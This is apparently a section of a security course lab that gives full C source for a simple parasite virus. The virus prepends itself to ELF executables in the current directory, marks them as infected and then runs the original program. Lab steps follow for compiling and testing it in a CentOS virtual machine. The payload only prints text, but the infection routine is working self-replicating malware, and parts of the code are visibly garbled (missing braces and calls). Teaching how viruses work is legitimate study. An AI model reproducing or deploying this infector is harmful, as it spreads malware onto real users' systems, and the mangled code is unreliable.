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8.3. Simple Parasite Virus

The following example presents simple code which purpose is to find not yet infected binary file, to infect it and thus ensure execution of malicious code that prints text to the terminal screen.
Skeleton of such a virus is as follows:
  1. Load virus into the memory.
  2. Look for ELF files (linux binary files) in current directory.
  3. If ELF file is found:
    1. Create temporary file and copy body of the virus to it.
    2. Add the program that is going to be infected to the end of the virus body.
    3. Add virus mark to the end of the file.
    4. Replace original program with the new one that contains virus.
  4. Run malicious activity.
  5. Create temporary file and copy original progam to this file.
  6. Launch the program (step 5).
  7. Remove the program (step 5).

       +-------------+ +
       |    Virus    | |
       |-------------| |
       |             | |
       |    Code     | |
       |             | |  size              +------------+
       |             | |   X                | Infection  |
       |             | |                    |------------|
       |             | |                    |            |
       |             | |                    |            |
       +-------------+ +                    |            |
                                            |   Virus    |
                                            |    Size    |
                                            |     X      |
                                            |            |
                                            |            |
                                            |            |
       +-------------+ +                    +------------+
       |   ELF file  | |                    |            |
       |-------------| |                    |            |
       |             | |                    |            |
       |             | |                    |            |
       |             | |                    |  Program   |
       |             | |                    |    Size    |
       |             | |                    |     Y      |
       |             | |  size              |            |
       |             | |   Y                |            |
       |    Code     | |                    |            |
       |             | |                    |            |
       |             | |                    +------------+
       |             | |                    |   Magic    |
       |             | |                    +------------+
       |             | |
       |             | |
       |             | |
       +-------------+ +
Next step is to introduce source code of the virus:
 * This is a trivial ELF file infector.  It simply pre-pends itself
 * to the beginning of ELF executibles.  When it runs it copies the
 * later half of itself to a temporary file and executes it.  Then
 * it deletes the temp file.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
#include <dirent.h>
#include <elf.h>
#include <fcntl.h>
#include <pwd.h>

// PARASITE_LENGTH the size of compiling virus //
#define PARASITE_LENGTH 10069
//infection rate indicator
#define MAGIC 6585
#define TMPFILE_TEMPLATE "/tmp/.virusXXXXXX"
#define MAX_BUF 1024

static int magic = MAGIC;

//virus file infication
int infect(char *filename, int hd, char *virus)
    //temp file handle
   int fd;
   //file info
   struct stat stat;
   char *data;
   char tmpfile[MAX_BUF];
   char cmd[MAX_BUF]="\0";
   int tmagic;	  // Store files magic number
   int magicloc;  // Location of magic number
   Elf32_Ehdr ehdr;

/* check file for ELF program, binary linux program */
   if(read(hd,&ehdr, sizeof(ehdr)) != sizeof(ehdr)) return 1;

	ehdr.e_ident[0] != ELFMAG0 ||
	ehdr.e_ident[1] != ELFMAG1 ||
	ehdr.e_ident[2] != ELFMAG2 ||
	ehdr.e_ident[3] != ELFMAG3
     ) return 1;

   //if (ehdr.e_type != ET_EXEC && ehdr.e_type != ET_DYN) return 1;
   //if (ehdr.e_machine != EM_386) return 1;
   //if (ehdr.e_version != EV_CURRENT) return 1;

/* check for magic (virus identificator) at the end of the file */
   if(fstat(hd, &stat) < 0) return 1;
   magicloc = stat.st_size - sizeof(magic);
   if( lseek(hd, magicloc, SEEK_SET) != magicloc ) return 1;

   //load magic character, infection rate
   if(read(hd, &tmagic, sizeof(magic)) != sizeof(magic)) return 1;
   //only infect if not already infected
   if(tmagic == MAGIC) return 1;
   if(lseek(hd, 0, SEEK_SET) != 0) exit(1);

/* Create temp file and self-extraction to temp file*/
   strncpy(tmpfile, TMPFILE_TEMPLATE, MAX_BUF);
   if(fd<0) { printf("open(%s)",tmpfile);exit(1); }
   if (write(fd, virus, PARASITE_LENGTH) != PARASITE_LENGTH) return 1;

/* memory allocation for new infected file*/
   data=(char *)malloc(stat.st_size);
   if(data==NULL) return 1;
   if(read(hd, data, stat.st_size) != stat.st_size) return 1;

/* add infected file at the end of virus, to the temp file*/
   if(write(fd,data, stat.st_size) != stat.st_size) return 1;
/* mark file as infected*/
   if(write(fd,&magic, sizeof(magic)) != sizeof(magic)) return 1;

/* permission and ownership*/
   if(fchown(fd, stat.st_uid, stat.st_gid) < 0) return 1;
   if(fchmod(fd, stat.st_mode) < 0) return 1;
/* rename temp file to original, now infected file*/
   sprintf(cmd,"cp %s %s",tmpfile,filename);
   if(system(cmd) != 0) return 1;


   printf("***Infected %s.\n", filename);

   return 0;

//search current directory for executable ELF files
void scan_dir(char *directory, char *virus)
   int hd, vd;
   int filecnt;
   DIR *dd;
   struct dirent *dirp;
   struct stat stat;
   char vfile[256];
   /* open directory */
   dd = opendir(directory);
   // step through the entire directory 
   if(dirp != NULL) {
	while (dirp = readdir(dd)) 
	strncpy(vfile, directory, 255);
	strcat(vfile, "/");
	strncat(vfile, dirp->d_name, 255-strlen(vfile));
	    hd=open(vfile, O_RDONLY, 0);
	    if(hd >= 0) {
		fstat(hd, &stat);
		 if(S_ISREG(stat.st_mode)) {
			vd=open(vfile, O_RDWR, 0);
			if(vd >= 0)
				infect(vfile, vd, virus);

//seemingly malicious code
void payload(void)
   printf("Malicious code...\n");

int main(int argc, char *argv[], char *envp[])
   int fd, tmpfd;
   struct stat stat;
   int len;
   char *data1, virus[PARASITE_LENGTH];
   char tmpfile[MAX_BUF];
   pid_t pid;
   /* get info on the file*/
   fd=open(argv[0], O_RDONLY, 0);
   if (fstat(fd, &stat) < 0) return 1;

   //load virus to memory
   if (read(fd, virus, PARASITE_LENGTH) != PARASITE_LENGTH) return 1;

   /* execute malicioud code */
   //search in current directory
   scan_dir(".", virus);

   //get the location of original code in original not infected file
   len = stat.st_size - PARASITE_LENGTH;
   if(data1 == NULL) return 1;
   if(lseek (fd, PARASITE_LENGTH, SEEK_SET) != PARASITE_LENGTH) return 1;

   /* load infected program code */
   if(read(fd, data1, len) != len) return 1; 

   /* write non-infected code to temp file */
   strncpy(tmpfile, TMPFILE_TEMPLATE, MAX_BUF);
   tmpfd = mkstemp(tmpfile);
   if(tmpfd <0) return 1;
   if (write(tmpfd, data1, len) != len) return 1;
   fchmod(tmpfd, stat.st_mode);

   /* create copy of current process */
   pid = fork();
   if (pid <0) exit(1);
   //launch extracted non-infected program
   if(pid ==0) exit(execve(tmpfile, argv, envp));
   //wait for the non-infected program and virus program to finish
   if(waitpid(pid, NULL, 0) != pid) exit(1);

   return 0;

8.3.1. Sleeping Phase

  1. Log into the remote system with ssh client.
  2. Launch VirtualBox and CentOS virtual system.
  3. Login credentials: root/password.
  4. Install required packages:
    $ yum -y groupinstall "Development Tools"
    $ yum -y install mc
  5. Download virus code:
    $ wget
  6. Compile source code:
    gcc -o virus virus.c
  7. Check the size of resulting virus binary file:
    $ ls -l virus
  8. Compare, if necessatry adjust, file size constant in source code with learned size:
    $ mcedit virus.c
    #define PARASITE_LENGTH 10710
  9. Re-compile:
    gcc -o virus virus.c
  10. Create "test" directory.
    $ mkdir test
  11. Copy virus to the new directory:
    $ cp virus ./test/